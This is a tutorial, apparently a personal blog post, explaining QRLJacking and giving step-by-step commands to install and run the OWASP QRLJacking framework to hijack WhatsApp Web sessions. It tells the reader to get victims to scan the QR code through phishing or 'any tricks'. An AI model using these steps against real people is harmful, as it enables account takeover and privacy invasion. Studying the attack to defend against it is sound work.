QRL Jacking

What's App Hijacking

QR code (abbreviated from Quick Response Code) is the trademark for a type of matrix barcode, QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts.

In a nutshell, the victim scans the attacker’s QR code which results in session hijacking. where we will steal all the requirements for a Whats Web app Application to load

Overview

1. The attacker initializes a client-side QR session and clones the Login QR Code into a phishing website “Now a well-crafted phishing page with a valid and regularly updated QR Code is ready to be sent to a Victim.”
2. The Attacker Sends the phishing page to the victim. (a lot of efficient attack vectors are going to be clarified later in the paper)
3. The Victim Scans the QR Code with a Specific Targeted Mobile App.
4. The Attacker gains control over the victim’s Account.
5. The service is exchanging all the victim’s data with the attacker’s session.

Installation Process:

Requirements:

• Linux or MAC OS
• Python 3.7+
• Firefox Web Browser

Step 1: Download/Clone The QRL jacking framework from Github

Command: git clone https://github.com/OWASP/QRLJacking.git

you can also download the zip and extract it.

Move into the directory by using

Step 2: Install all the required modules using pip

pip is a package management system written in Python used to install and manage software packages

Command: python3 -m pip install -r requirement.txt

Step 3: Install Gecko driver

This program provides the HTTP API described by the WebDriver protocol. to communicate with Gecko browsers, such as Firefox.

Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases

Let's automate things:

Commands:

• wget https://github.com/mozilla/geckodriver/releases/download/v0. 29.1/geckodriver-v0.29.1-linux64.tar.gz
• tar -zxvf geckodriver-v0.29.1-linux64.tar.gz
• chmod +x geckodriver
• sudo mv -f geckodriver /usr/local/share/geckodriver
• sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
• sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

Step 4: Starting and configuring QRL Jacker

Starting QRL jacker script : python3 QrlJacker.py

the banner may vary from time to time ;)

Step 5: Configuring whats app module and listener

Commands:

• use grabber/whatsapp
• set port 2001
• set host 127.0.0.1

Step 6: Open Firefox and Scan the QR

Open your firerfox browser and type in http://host:port

• http://127.0.0.1:2001

QR code that has to be scanned in WhatsApp App

Make sure that the victim scans the QR, you can use phishing or any tricks to deliver this QR to the victim

Step 7: After scanning and usage

I personally scanned this QR, after scanning you may get a message as shown below:

session has been saved successfully

Commands to interact and use

• sessions

sessions command will help us to show the active connections available to interact

• sessions -i 0

The sessions -i <number> will help us to interact with the session and opens the victim whats app directly on firefox

My whatsapp

I also recorded this part but the gecko installation part isn’t available in that recording G drive URL

You can explore this tool at:

OWASP/QRLJacking

Thank you very much for making up to here — Cyber might

Do follow @iamcybermight for more content